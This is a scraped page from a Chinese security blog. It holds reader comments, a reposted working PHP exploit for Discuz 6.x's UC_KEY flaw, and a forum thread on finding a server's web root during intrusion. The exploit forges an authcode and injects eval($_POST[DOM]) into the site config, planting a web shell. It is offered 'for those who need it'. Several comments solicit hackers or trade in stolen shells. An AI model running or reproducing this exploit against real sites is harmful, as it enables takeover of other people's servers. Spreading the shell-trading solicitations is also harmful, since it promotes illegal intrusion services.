pSany @ 2015-12-22 23:52:54/p p style="text-indent:2em"坚持就是胜利,谢谢分享经历。/p p本站回复:/p p style="text-indent:2em"感谢!/p /blockquote blockquote id="8096,4582,112.92.70.147" p佚名 @ 2015-12-26 11:20:27/p p style="text-indent:2em"贺电贺电,就差你被神化了/p p本站回复:/p p style="text-indent:2em"-_-!!!/p /blockquote blockquote id="8102,4582,10.116.98.82" pNEUIN @ 2015-12-31 00:34:51/p p style="text-indent:2em"同在荣誉会员群,当时测试过你那网吧写的远程软件,你啥时候把我删了。/p p本站回复:/p p style="text-indent:2em"QQ人太多,定期清理。/p /blockquote blockquote id="8104,4582,117.63.36.56" plotion @ 2016-01-02 10:07:27/p p style="text-indent:2em"我们特别像啊~~~~/p p本站回复:/p p style="text-indent:2em"与君共勉!/p /blockquote blockquote id="8106,4582,112.44.202.48" pwormfox @ 2016-01-03 19:17:24/p p style="text-indent:2em"很多相同的经历!/p p本站回复:/p p style="text-indent:2em"与君共勉!/p /blockquote blockquote id="8107,4582,171.221.24.102" p哈哈 @ 2016-01-04 23:07:10/p p style="text-indent:2em"跟核总有过一些相似的经历,我几年前就转行了,转玩金融了.......但还是默默关注安全这行业。。。。。。。。。。/p p本站回复:/p p style="text-indent:2em"哈哈哈,你转行的早!!与君共勉!/p /blockquote blockquote id="8113,4582,119.78.214.36" p烟头 @ 2016-01-10 21:52:51/p p style="text-indent:2em"网吧一样的经历,验证码很操蛋你知道么/p p本站回复:/p p style="text-indent:2em"-_-!!!/p /blockquote blockquote id="8125,4582,117.172.27.118" p拉拉 @ 2016-01-16 20:33:21/p p style="text-indent:2em"哈哈哈哈哈两个无关紧要的问题 1、课桌上的初中《信息技术》已快被翻烂,里边写满了各种笔记以及自己的心得体会,还在空白处手算二进制、八进制、十进制、十六进制,估计全校就我一个这么干吧,其他人都撕了折飞机…… 现在看来没什么 但当时同学有没有觉得你很装之类的啊。 2、从此一发不可收拾,什么《黑客X档案》、《黑客防线》、《黑客手册》、《大众电脑》之类的每周必买,当时只有一个报刊亭卖,每次还只有两三本,去迟了就没了! 有没有知道买这些书其他几个人去干什么了/p p本站回复:/p p style="text-indent:2em"1、想己所想,做己所做;旁人想法,不曾注意。 2、城镇很小,高手寥寥,想必都拿去擦屁股了……/p /blockquote blockquote id="8141,4582,112.80.217.106" pCoreFish @ 2016-01-30 10:39:49/p p style="text-indent:2em"有着一段与何总相仿却还没书写完整的经历,之所以这么说是因为现正处于核总用VB编写“Hello World”的年龄,却有着核总许多的后续经历,看完文章激励人心,希望能往核总的方向发展吧。/p p本站回复:/p p style="text-indent:2em"与君共勉!/p /blockquote blockquote id="8142,4582,122.96.28.80" pCoreFish @ 2016-02-01 11:54:00/p p style="text-indent:2em"心无所妄,心落于实,想己所想,做己所做,如其所是,非己所想,不忘初心,方得终始。/p p本站回复:/p p style="text-indent:2em"大师!/p /blockquote blockquote id="8143,4582,112.250.55.46" p尼古拉斯赵四 @ 2016-02-01 18:41:41/p p style="text-indent:2em"我点一个赞,给99分,一分用666的形式给楼主,避免楼主傲娇以后不更新博客。/p p本站回复:/p p style="text-indent:2em"你赢了! -_-!!!/p /blockquote blockquote id="8161,4582,118.77.246.171" p小成 @ 2016-02-25 14:21:33/p p style="text-indent:2em"小成致核电,哈哈哈,觉得差不多的人,这不是你们特么高中辍学的理由。我不是针对谁,我只想说,在座的各位。。。/p p本站回复:/p p style="text-indent:2em"-_-!!!/p /blockquote blockquote id="8167,4582,14.215.167.227" p某站长 @ 2016-03-03 23:12:06/p p style="text-indent:2em"哎,当年拿着自己的红包钱去买了5块的虚拟主机然后搞了一个com域名 然后办了一个论坛,之后因为穷的问题关站。现在想起来当初的论坛真垃圾。/p p本站回复:/p p style="text-indent:2em"-_-!!!/p /blockquote blockquote id="8175,4582,111.37.1.56" p来自某大学的大二屌丝 @ 2016-03-07 18:13:16/p p style="text-indent:2em"小时候和你一样,很喜爱电脑 一年级接触,四年级时在机房百度查询了杀进程代码,还查询了注册表找到卸载密码,自己电脑上安上了教室客户端。。。。。各种关机。。。。后来可能我在家里生活得太安逸,木有像您这样坚持下去。。。。。。/p p本站回复:/p p style="text-indent:2em"-_-!!!/p /blockquote blockquote id="8176,4582,27.42.106.219" pzdir @ 2016-03-07 21:41:48/p p style="text-indent:2em"挺励志,我不会放弃./p p本站回复:/p p style="text-indent:2em"感谢支持!与君共勉!/p /blockquote blockquote id="8177,4582,220.168.204.130" pMonster @ 2016-03-07 21:46:40/p p style="text-indent:2em"核总,请问你当网管的时候,一天睡多少小时啊我擦,我现在跟核总的情况差不多,高中喜欢上了黑客技术,一直在坚持,真的非常着迷。我现在也在一家网吧也当网管,的确网吧的环境很难让人静下心来学习,,,/p p本站回复:/p p style="text-indent:2em"七八个小时吧~与君共勉!/p /blockquote blockquote id="8185,4582,113.83.194.140" p佚名 @ 2016-03-15 23:13:06/p p style="text-indent:2em"核总已经2016年了,还没老婆和情人吗?/p p本站回复:/p p style="text-indent:2em"你猜~/p /blockquote blockquote id="8187,4582,218.76.128.58" pAny3ite @ 2016-03-18 15:01:48/p p style="text-indent:2em"什么时候这个验证问题怎么还出现这 18、注销已登录用户的命令是? [换一个] [找答案] 介意添加点关于男人都懂的知识么?/p p本站回复:/p p style="text-indent:2em"你赢了…… -_-!!!/p /blockquote blockquote id="8198,4582,1.86.29.159" p黑鸡 @ 2016-03-29 13:56:50/p p style="text-indent:2em"你好蛋疼/p p本站回复:/p p style="text-indent:2em"啊/p /blockquote blockquote id="8238,4582,180.111.133.193" pSovi @ 2016-04-26 00:56:13/p p style="text-indent:2em"核总,咱俩经历挺像的/p p本站回复:/p p style="text-indent:2em"与君共勉!/p /blockquote /div

DZ6.x 的 UC_KEY getwebshell exploit

✇Nuclear'Atk(核攻击)网络安全实验室
2015年11月24日 14:33
p style="text-indent:2em;" DZ6.x的UC_KEY getwebshell exploit /p p style="text-indent:2em;" L.N. (http://ln.sycsec.com/) | 2015-11-17 13:55 /p p style="text-indent:2em;" 网上有dz 7.x和dz x系列的uc_key 利用方式,今天遇到了一个dz6.0的网站,于是分析了下代码,改了下利用程序,分享给需要的人。uc_key getshell 是一个影响比较广存在比较久的漏洞,基本上使用ucenter做用户中心的程序都可以使用,但需要根据特定程序写特定利用。最新版本的dz好像是修补了,没有具体看代码了。 /p p style="text-indent:2em;" ps:需要或者感觉不错的请挥挥你的小手 点击 “顶” /p p style="text-indent:2em;" 注意三个地方: /p p style="text-indent:2em;" 1.在dz6.x中对xml的解析是不一样的,所以需要修改利用exp /p pre class="prettyprint"$post = uc_unserialize(uc_post_contents());/pre p style="text-indent:2em;" 2.低版本中$UC_API并没有转义,所以不需要提交2个包 /p pre class="prettyprint lang-js"$configfile = preg_replace("/define\('UC_API',\s*'.*?'\);/i", "define('UC_API', '$UC_API');", $configfile);/pre p style="text-indent:2em;" 3.低版本的加密函数也是不一样的 /p pre class="prettyprint"lt;?php // 代码版权归原作者所有! $timestamp = time()+10*3600; $host="127.0.0.1"; $uc_key="Qfp1O0N3h5V356bbUdPer3958dp8X3b55dBa9fKai7s3Q7AbY9I3Hcnc7ec505sa"; $code=urlencode(_authcode("time=$timestampamp;action=updateapps", 'ENCODE', $uc_key)); $cmd1='lt;?xml version="1.0" encoding="ISO-8859-1"?gt; lt;rootgt; lt;UC_API id="UC_API"gt;http://xxx\');eval($_POST[DOM]);//lt;/UC_APIgt; lt;/rootgt;'; $html1 = send($cmd1); echo $html1; function send($cmd){ global $host,$code; $message = "POST /dz/api/uc.php?code=".$code." HTTP/1.1\r\n"; $message .= "Accept: */*\r\n"; $message .= "Referer: ".$host."\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $message .= "Host: ".$host."\r\n"; $message .= "Content-Length: ".strlen($cmd)."\r\n"; $message .= "Connection: Close\r\n\r\n"; $message .= $cmd; $fp = fsockopen($host, 80); fputs($fp, $message); $resp = ''; while ($fp amp;amp; !feof($fp)) $resp .= fread($fp, 1024); return $resp; } function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) { $ckey_length = 4; $key = md5($key ? $key : UC_KEY); $keya = md5(substr($key, 0, 16)); $keyb = md5(substr($key, 16, 16)); $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ''; $cryptkey = $keya.md5($keya.$keyc); $key_length = strlen($cryptkey); $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string; $string_length = strlen($string); $result = ''; $box = range(0, 255); $rndkey = array(); for($i = 0; $i lt;= 255; $i++) { $rndkey[$i] = ord($cryptkey[$i % $key_length]); } for($j = $i = 0; $i lt; 256; $i++) { $j = ($j + $box[$i] + $rndkey[$i]) % 256; $tmp = $box[$i]; $box[$i] = $box[$j]; $box[$j] = $tmp; } for($a = $j = $i = 0; $i lt; $string_length; $i++) { $a = ($a + 1) % 256; $j = ($j + $box[$a]) % 256; $tmp = $box[$a]; $box[$a] = $box[$j]; $box[$j] = $tmp; $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256])); } if($operation == 'DECODE') { if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() gt; 0) amp;amp; substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) { return substr($result, 26); } else { return ''; } } else { return $keyc.str_replace('=', '', base64_encode($result)); } } ?gt;/pre p style="text-indent:2em;" a href="http://zone.wooyun.org/content/23953" target="_blank"[原文地址]/a /p pstrong留言评论(旧系统):/strong/p div style="max-height:600px;width:100%;overflow:auto;overflow-x:hidden;" blockquote id="8029,4581,113.69.100.49" p佚名 @ 2015-12-01 15:14:40/p p style="text-indent:2em"学习了/p p本站回复:/p p style="text-indent:2em"good good study, day day up~/p /blockquote blockquote id="8038,4581,223.72.64.122" p佚名 @ 2015-12-04 14:55:22/p p style="text-indent:2em"我想找个黑客做业务 业务量很大 有意向联系我 谢谢1343119337/p p本站回复:/p p style="text-indent:2em"-_-!!!/p /blockquote blockquote id="8055,4581,117.174.30.187" p佚名 @ 2015-12-12 12:54:49/p p style="text-indent:2em"寻找一名渗透的技术员,弄个小网站Q632523093/p p本站回复:/p p style="text-indent:2em"站长提示:网络广告有风险,注意辨别,谨防上当受骗!!!/p /blockquote blockquote id="8118,4581,125.119.10.40" p佚名 @ 2016-01-11 15:01:01/p p style="text-indent:2em"up up/p p本站回复:/p p style="text-indent:2em"-_-!!!/p /blockquote blockquote id="8131,4581,120.71.25.166" pGood @ 2016-01-23 21:27:20/p p style="text-indent:2em"This payload is Good./p p本站回复:/p p style="text-indent:2em"-_-!!!/p /blockquote blockquote id="8155,4581,119.41.241.39" pboom @ 2016-02-20 13:35:00/p p style="text-indent:2em"收SHELL 收SHENLL 收高权重SHELL 重要的事说3遍, 邮箱:1755961338@qq.com/p p本站回复:/p p style="text-indent:2em"-_-!!!/p /blockquote blockquote id="8262,4581,1.207.43.147" p佚名 @ 2016-05-21 15:20:51/p p style="text-indent:2em"长期出售SHELL,要的qq751845429/p p本站回复:/p p style="text-indent:2em"友情提示:网络广告有风险,注意辨别,谨防上当受骗!!!/p /blockquote /div

讨论:如何只使用一条命令找出系统web路径,渗透时秒找网站根目录?

✇Nuclear'Atk(核攻击)网络安全实验室
2015年10月26日 16:29
p style="text-indent:2em;" 一条命令找出系统web路径 /p p style="text-indent:2em;" xsser (十根阳具有长短!!) | 2015-10-23 17:48 /p p style="text-indent:2em;" 经常在一个系统里需要快速定位到web路径,如果在标准化系统里如何一条命令快速实现这一点呢? /p p style="text-indent:2em;" :) /p p style="text-indent:2em;" a href="http://zone.wooyun.org/content/23539" target="_blank"[原文地址]/a /p p strong各种吐槽:/strong /p p style="text-indent:2em;" 1# /p p style="text-indent:2em;" YY-2012 (#)lt;alert("dandan")gt;(#) | 2015-10-23 17:59 /p p style="text-indent:2em;" find /p p style="text-indent:2em;" 2# /p p style="text-indent:2em;" 园长 (喵~) | 2015-10-23 18:02 /p p style="text-indent:2em;" find / -name "*.php" /p p style="text-indent:2em;" 3# /p p style="text-indent:2em;" 数据流 (| 1970-00-00 00:00) | 2015-10-23 18:15 /p p style="text-indent:2em;" 在网站上找个比较唯一的文件名,例如"member_index.php" 然后find之 /p p style="text-indent:2em;" 4# /p p style="text-indent:2em;" 乌云厂商 | 2015-10-23 18:24 /p p style="text-indent:2em;" .bash_history /p p style="text-indent:2em;" 5# /p p style="text-indent:2em;" if、so | 2015-10-23 18:36 /p p style="text-indent:2em;" 找脚本文件会有备份文件和多个web目录的干扰,在目录杂乱的时候,可以find自己上传的文件 /p p style="text-indent:2em;" 6# /p p style="text-indent:2em;" 猪猪侠 (每次有人骂我是猪我都说自己是猪猪侠) | 2015-10-23 18:48 /p p style="text-indent:2em;" httpd,nginx,tomcat,jboss的error_log /p p style="text-indent:2em;" 7# /p p style="text-indent:2em;" ❤ (❤) | 2015-10-23 18:55 /p p style="text-indent:2em;" find . -name "*.类型" | xargs grep "关键字" /p p style="text-indent:2em;" 8# /p p style="text-indent:2em;" 李旭敏 (˿̖̗̀́̂̃̄̅̆̇̈̉̊̋̌̍̎̏̐̑̒̓̔̕) | 2015-10-23 18:58 /p p style="text-indent:2em;" find robots.txt /p p style="text-indent:2em;" 9# /p p style="text-indent:2em;" jeary ((:‮?办么怎,了多越来越法方象抽的我)) | 2015-10-23 19:02 /p p style="text-indent:2em;" 打开web查看源码,复制一个特征字符串,然后替换进下面命令的htmlString搜索之。 /p p style="text-indent:2em;" win: findstr /s /i /n /d:C:\ "htmlString" *.* /p p style="text-indent:2em;" linux: find / -name "*.*" | xargs grep "htmlString" /p p style="text-indent:2em;" 10# /p p style="text-indent:2em;" ❤ (❤) | 2015-10-23 19:09 /p p style="text-indent:2em;" @jeary 鼠大侄,Win的搜索第一次用,测试了下蛮好使. /p p style="text-indent:2em;" 11# /p p style="text-indent:2em;" Sunshie (博客http://phpinfo.me 论坛 www.itgou.club) | 2015-10-23 19:11 /p p style="text-indent:2em;" cat /etc/nginx/conf/vhost/web.conf | grep root /p p style="text-indent:2em;" 12# /p p style="text-indent:2em;" px1624 (aaaaaaaaa) | 2015-10-23 19:30 /p p style="text-indent:2em;" find吧,不过前提需要有个独一无二的参考文件或者文件夹 /p p style="text-indent:2em;" 13# /p p style="text-indent:2em;" jeary ((:‮?办么怎,了多越来越法方象抽的我)) | 2015-10-23 20:25 /p p style="text-indent:2em;" @❤ 其实我觉得重点不在于搜索的命令,因为大家都懂。而在于怎样匹配一个通用特征。如果只是单个web倒是好办。如果要做到通用,我觉得还是需要一个脚本来搞定。 /p p style="text-indent:2em;" 14# /p p style="text-indent:2em;" loopx9 | 2015-10-23 20:52 /p p style="text-indent:2em;" /proc/self/cmdline /p p style="text-indent:2em;" /proc/self/maps /p p style="text-indent:2em;" web容器路径--gt;配置文件 /p p style="text-indent:2em;" 15# /p p style="text-indent:2em;" 蓝翔小王子淫长 | 2015-10-23 23:15 /p p style="text-indent:2em;" find吧 /p p style="text-indent:2em;" 16# /p p style="text-indent:2em;" 醉青丝 | 2015-10-23 23:27 /p p style="text-indent:2em;" find / -name "*sdasiod.jpg" /p p style="text-indent:2em;" 17# /p p style="text-indent:2em;" mramydnei | 2015-10-24 12:55 /p p style="text-indent:2em;" 这种写法应该有点作弊嫌疑,不过改一改应该能用。。 /p p style="text-indent:2em;" 输入: /p p style="text-indent:2em;" root@kali:/etc/nginx/sites-available# echo "-----------------------start---------------------";find /etc -maxdepth 3 -name "*" 2gt;amp;1|xargs grep -s -i 'root /'| grep -s -i 'nginx\|apache';echo "-----------------------done----------------------" /p p style="text-indent:2em;" 输出: /p p style="text-indent:2em;" -----------------------start--------------------- /p p style="text-indent:2em;" /etc/nginx/sites-enabled/default: root /var/www/html; /p p style="text-indent:2em;" /etc/nginx/sites-enabled/default:# root /var/www/example.com; /p p style="text-indent:2em;" /etc/nginx/sites-available/default: root /var/www/html; /p p style="text-indent:2em;" /etc/nginx/sites-available/default:# root /var/www/example.com; /p p style="text-indent:2em;" /etc/apache2/mods-available/cache_disk.conf: CacheRoot /var/cache/apache2/mod_cache_disk /p p style="text-indent:2em;" /etc/apache2/sites-enabled/000-default.conf: DocumentRoot /var/www/html /p p style="text-indent:2em;" /etc/apache2/sites-available/000-default.conf: DocumentRoot /var/www/html /p p style="text-indent:2em;" /etc/apache2/sites-available/default-ssl.conf: DocumentRoot /var/www/html /p p style="text-indent:2em;" -----------------------done---------------------- /p p style="text-indent:2em;" 18# /p p style="text-indent:2em;" 麦兜 (麦兜爱吃苹果) | 2015-10-24 16:46 /p p style="text-indent:2em;" For I in (curl http://localhost |grep -oP ([a-Z]{1-6})[\.js]));do for d in $(find / -name "*.js");do grep $i $d;done;done /p p style="text-indent:2em;" 没实验,意思是打开首页匹配js文件。系统内搜索所有文件js文件,匹配js文件名 /p p style="text-indent:2em;" 19# /p p style="text-indent:2em;" 无敌L.t.H (‮……天百一爱恋考高:簿相色白产国) | 2015-10-24 19:43 /p p style="text-indent:2em;" 用lsof也可以,看打开的文件,不过不一定装有,对于用缓存的也不好办。 /p p style="text-indent:2em;" 20# /p p style="text-indent:2em;" huotoo | 2015-10-25 11:18 /p p style="text-indent:2em;" 要是网站根目录下有robots.txt 我觉得 通常 locate robots.txt /p p style="text-indent:2em;" 觉可以了 /p p style="text-indent:2em;" 21# /p p style="text-indent:2em;" Blackeagle (向WooYun致敬) | 2015-10-25 12:29 /p p style="text-indent:2em;" grep -r "robots" www /p p style="text-indent:2em;" 22# /p p style="text-indent:2em;" 小胖子 (z7y首席代言人,园长的表哥...) | 2015-10-25 14:56 /p p style="text-indent:2em;" 看你们都说linux下的 我来说说windows下 /p p style="text-indent:2em;" win下,简单办法,从web找一个banner 比如 xsser.avi /p p style="text-indent:2em;" 执行 wmic datafile where "filename='xsser' and extension='avi'" get caption /p p style="text-indent:2em;" 搞定。 /p p style="text-indent:2em;" 23# /p p style="text-indent:2em;" 围剿 (七月流火,八月未央,九月白露凝成轻霜) | 2015-10-25 15:42 /p p style="text-indent:2em;" find index.php /p p style="text-indent:2em;" 24# /p p style="text-indent:2em;" _Evil (科普是一种公益行为) | 2015-10-26 09:17 /p p style="text-indent:2em;" Java EE application /p p style="text-indent:2em;" case : http://baidu.com/wooyun/ /p p style="text-indent:2em;" pwd: /p p style="text-indent:2em;" /opt/xxx /p p style="text-indent:2em;" cd /opt/xxx/webapps/ROOT/ or /opt/xxx/webapps/wooyun/ /p p style="text-indent:2em;" war:/opt/xxx/webapps/wooyun.war or /opt/xxx/webapps/wooyun.{还有一个后缀名字忘记了} /p p style="text-indent:2em;" 25# /p p style="text-indent:2em;" 爱捣蛋的鬼 | 2015-10-26 09:36 /p p style="text-indent:2em;" @Sunshie 还有tengine, :) /p p style="text-indent:2em;" 26# /p p style="text-indent:2em;" 爱捣蛋的鬼 | 2015-10-26 09:43 /p p style="text-indent:2em;" align="left" @mramydne ubuntu :) /p p style="text-indent:2em;" 27# /p p style="text-indent:2em;" a href="https://lcx.cc/" target="_blank"核攻击/a (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2015-10-26 15:24 /p p style="text-indent:2em;" dir /s/a-d/b d:\*重复度较低的文件名(支持通配符)* /p pstrong留言评论(旧系统):/strong/p div style="max-height:600px;width:100%;overflow:auto;overflow-x:hidden;" blockquote id="8035,4577,223.72.64.122" p佚名 @ 2015-12-04 14:50:10/p p style="text-indent:2em"我想找个黑客帮我拿站 业务很多1343119337/p p本站回复:/p p style="text-indent:2em"-_-!!!/p /blockquote blockquote id="8127,4577,125.39.160.81" p佚名 @ 2016-01-17 01:03:00/p p style="text-indent:2em"我被封笔尘缘骗了1800 接单的联系我1343119337/p p本站回复:/p p style="text-indent:2em"站长提示:网络广告有风险,注意辨别,谨防上当受骗!!!/p /blockquote blockquote id="8229,4577,125.64.82.9" p合作 @ 2016-04-20 16:47:37/p p style="text-indent:2em"2819306134/p p本站回复:/p p style="text-indent:2em"?/p /blockquote blockquote id="8230,4577,125.64.82.9" p合作 @ 2016-04-20 16:49:25/p p style="text-indent:2em"2819306134/p p本站回复:/p p style="text-indent:2em"?/p /blockquote /div
❌
❌